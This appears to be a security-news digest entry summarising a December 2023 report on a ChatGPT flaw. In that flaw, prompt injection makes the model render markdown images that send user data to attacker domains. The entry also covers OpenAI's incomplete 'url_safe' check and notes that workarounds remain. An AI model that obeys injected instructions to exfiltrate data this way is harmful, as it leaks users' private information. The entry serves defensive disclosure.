AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

OpenAI Begins Tackling ChatGPT Data Leak Vulnerability

mediumnewsLLM-Specific

security

Source: Embrace The RedDecember 20, 2023

Summary

OpenAI has begun addressing a data exfiltration vulnerability (where attackers steal user data) in ChatGPT that exploits image markdown rendering during prompt injection attacks (tricking an AI by hiding instructions in its input). The company implemented a client-side validation check called 'url_safe' on the web app that blocks images from suspicious domains, though the fix is incomplete and attackers can still leak small amounts of data through workarounds.

Solution / Mitigation

OpenAI implemented a mitigation by adding a client-side validation API call (url_safe endpoint) that checks whether image URLs are safe before rendering them. The validation returns {"safe":false} to prevent rendering images from malicious domains. However, the source explicitly notes this is not a complete fix and suggests OpenAI should additionally "limit the number of images that are rendered per response to just one or maybe a handful maximum" to further reduce bypass techniques. The source also notes the current iOS version 1.2023.347 (16603) does not yet have these improvements.